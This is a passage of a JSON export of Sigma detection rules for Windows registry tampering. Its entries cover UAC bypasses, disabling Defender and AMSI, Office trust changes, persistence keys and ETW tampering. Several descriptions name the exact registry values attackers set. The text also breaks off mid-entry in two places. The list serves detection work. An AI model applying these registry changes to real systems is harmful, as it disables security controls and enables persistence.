}, { "description": "Detects registry changes to Office trust records where the path is located in a potentially suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-21", "falsepositive": [ "Unlikely" ], "filename": "registry_set_office_trust_record_susp_location.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "Internal Research", "https://twitter.com/inversecos/status/1494174785621819397", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trust_record_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "value": "Macro Enabled In A Potentially Suspicious Document" }, { "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", "meta": { "author": "frack113", "creation_date": "2022-01-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_bypass_uac_using_eventviewer.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" ], "tags": [ "attack.persistence", "attack.t1547.010" ] }, "related": [ { "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "value": "Bypass UAC Using Event Viewer" }, { "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Might trigger if a legitimate new SIP provider is registered. 
But this is not a common occurrence in an environment and should be investigated either way" ], "filename": "registry_set_persistence_mpnotify.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/mpnotify.html", "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", "value": "Potential Persistence Via Mpnotify" }, { "description": "Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-23", "falsepositive": [ "Unlikely" ], "filename": "registry_set_odbc_driver_registered_susp.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_odbc_driver_registered_susp.yml" ], "tags": [ "attack.persistence", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4", "value": "Potentially Suspicious ODBC Driver Registered" }, { "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-01-10", "falsepositive": [ "Legitimate Addin Installation" ], "filename": "registry_set_persistence_office_vsto.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ 
"https://vanmieghem.io/stealth-outlook-persistence/", "https://twitter.com/_vivami/status/1347925307643355138", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml" ], "tags": [ "attack.t1137.006", "attack.persistence" ] }, "related": [ { "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "value": "Potential Persistence Via Visual Studio Tools for Office" }, { "description": "Detects changes to the \"HVCIDisallowedImages\" registry value to potentially add a driver to the list, in order to prevent it from loading.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe)", "creation_date": "2023-12-05", "falsepositive": [ "Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended" ], "filename": "registry_set_hvci_disallowed_images.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf", "https://x.com/yarden_shafir/status/1822667605175324787", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hvci_disallowed_images.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "555155a2-03bf-4fe7-af74-d176b3fdbe16", "value": "Driver Added To Disallowed Images In HVCI - Registry" }, { "description": "Detects changes to registry keys related to \"Trusted Location\" of Microsoft Office where the path is set to something uncommon. 
Attackers might add additional trusted locations to avoid macro security restrictions.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-21", "falsepositive": [ "Other unknown legitimate or custom paths need to be filtered to avoid false positives" ], "filename": "registry_set_office_trusted_location_uncommon.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trusted_location_uncommon.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f742bde7-9528-42e5-bd82-84f51a8387d2", "value": "Uncommon Microsoft Office Trusted Location Added" }, { "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", "meta": { "author": "frack113", "creation_date": "2022-10-01", "falsepositive": [ "Unknown" ], "filename": "registry_set_susp_user_shell_folders.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", 
"value": "Modify User Shell Folders Startup Value" }, { "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", "meta": { "author": "frack113", "creation_date": "2022-01-16", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_administrative_share.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.005" ] }, "related": [ { "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "value": "Disable Administrative Share Creation at Startup" }, { "description": "Detects changes to the \"MaxMpxCt\" registry value.\nMaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. 
Note that if the value is set beyond 125, older Windows 9x clients will fail to negotiate.
"description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18f2065c-d36c-464a-a748-bcf909acb2e3", "value": "Wow6432Node Classes Autorun Keys Modification" }, { "description": "Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\nBefore doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. 
This registry key should store a value named \"Ime File\" with a DLL path.\nIMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-11-21", "falsepositive": [ "IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean." ], "filename": "registry_set_ime_non_default_extension.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ime_non_default_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b888e3f2-224d-4435-b00b-9dd66e9ea1f1", "value": "Uncommon Extension In Keyboard Layout IME File Registry Value" }, { "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate SIP being registered by the OS or different software." 
], "filename": "registry_set_sip_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/gtworek/PSBits/tree/master/SIP", "https://persistence-info.github.io/Data/codesigning.html", "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1553.003" ] }, "related": [ { "dest-uuid": "543fceb5-cb92-40cb-aacf-6913d4db58bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", "value": "Persistence Via New SIP Provider" }, { "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-10", "falsepositive": [ "Unlikely" ], "filename": "registry_set_persistence_autodial_dll.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/autodialdll.html", "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "value": "Potential Persistence Via AutodialDLL" }, { "description": "Detects the abuse of custom file open handler, executing powershell", "meta": { "author": "CD_R0M_", "creation_date": "2022-06-11", "falsepositive": [ "Unknown" ], "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", 
"refs": [ "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "value": "Custom File Open Handler Executes PowerShell" }, { "description": "Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.", "meta": { "author": "@SerkinValery, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-12", "falsepositive": [ "Legitimate internal requirements." ], "filename": "registry_set_clickonce_trust_prompt.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5", "https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_clickonce_trust_prompt.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac9159cc-c364-4304-8f0a-d63fc1a0aabb", "value": "ClickOnce Trust Prompt Tampering" }, { "description": "Detects the enabling of the Windows Recall feature via registry manipulation. 
Windows Recall can be enabled by setting the value of \"DisableAIDataAnalysis\" to \"0\".\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\n", "meta": { "author": "Sajid Nawaz Khan", "creation_date": "2024-06-02", "falsepositive": [ "Legitimate use/activation of Windows Recall" ], "filename": "registry_set_enable_windows_recall.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis", "https://learn.microsoft.com/en-us/windows/client-management/manage-recall", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enable_windows_recall.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75180c5f-4ea1-461a-a4f6-6e4700c065d4", "value": "Windows Recall Feature Enabled - Registry" }, { "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", "meta": { "author": "Omkar Gudhate", "creation_date": "2020-09-27", "falsepositive": [ "Unknown" ], "filename": "registry_set_comhijack_sdclt.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.exploit-db.com/exploits/47696", "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1546", "attack.t1548" ] }, "related": [ { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", "value": "COM Hijack via Sdclt" }, { "description": "Detect the creation of a service with a service binary located in a suspicious directory", "meta": { "author": "Florian Roth (Nextron Systems), frack113", "creation_date": "2022-05-02", "falsepositive": [ "Unknown" ], "filename": "registry_set_creation_service_susp_folder.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "value": "Service Binary in Suspicious Folder" }, { "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-01", "falsepositive": [ "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "filename": "registry_set_susp_printer_driver.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1410545674773467140", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" ], "tags": [ "attack.privilege-escalation", 
"attack.t1574", "cve.2021-1675" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0813366-0407-449a-9869-a2db1119dc41", "value": "Suspicious Printer Driver Empty Manufacturer" }, { "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "registry_set_powershell_execution_policy.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "value": "Potential PowerShell Execution Policy Tampering" }, { "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", "meta": { "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "creation_date": "2017-03-17", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_bypass_sdclt.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", "value": "UAC Bypass via Sdclt" }, { "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", "meta": { "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", "creation_date": "2018-08-25", "falsepositive": [ "Software using weird folders for updates" ], "filename": "registry_set_susp_run_key_img_folder.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "value": "New RUN Key Pointing to Suspicious Folder" }, { "description": "Detects changes to the AMSI come server registry key in order disable 
AMSI scanning functionalities. When AMSI attempts to start its COM component
"uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", "value": "Windows Defender Exclusions Added - Registry" }, { "description": "Detects potential persistence activity via outlook home page.\nAn attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.\n", "meta": { "author": "Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand", "creation_date": "2021-06-09", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_outlook_homepage.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml" ], "tags": [ "attack.persistence", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "value": "Potential Persistence Via Outlook Home Page" }, { "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-09", "falsepositive": [ "Unknown" ], "filename": "registry_set_rpcrt4_etw_tamper.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112", "attack.t1562" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90f342e1-1aaa-4e43-b092-39fda57ed11e", "value": "ETW Logging Disabled For rpcrt4.dll" }, { "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_bypass_wmp.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", "value": "UAC Bypass Using Windows Media Player - Registry" }, { "description": "Detects potential persistence using Appx DebugPath", "meta": { "author": "frack113", "creation_date": "2022-07-27", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_appx_debugger.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/rootm0s/WinPwnage", "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", "value": "Potential Persistence Using DebugPath" }, { "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", "meta": { "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "creation_date": "2022-08-01", "falsepositive": [ "Administrator actions" ], "filename": "registry_set_disable_windows_defender_service.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "value": "Windows Defender Service Disabled - Registry" }, { "description": "Detects the enabling of the PowerShell script execution policy. 
Once enabled, this policy allows scripts to be executed.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Thurein Oo", "creation_date": "2023-10-18", "falsepositive": [ "Likely" ], "filename": "registry_set_powershell_enablescripts_enabled.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml" ], "tags": [ "attack.execution" ] }, "uuid": "8218c875-90b9-42e2-b60d-0b0069816d10", "value": "PowerShell Script Execution Policy Enabled" }, { "description": "Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the \"UACDisableNotify\" value.\nUAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.\nWhen \"UACDisableNotify\" is set to 1, UAC prompts are suppressed.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_disable_notification.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md", "https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_disable_notification.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, 
"related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c5f6a85d-b647-40f7-bbad-c10b66bab038", "value": "UAC Notification Disabled" }, { "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_disallowrun_execution.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9", "value": "Add DisallowRun Execution to Registry" }, { "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-25", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_macroruntimescanscope.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", 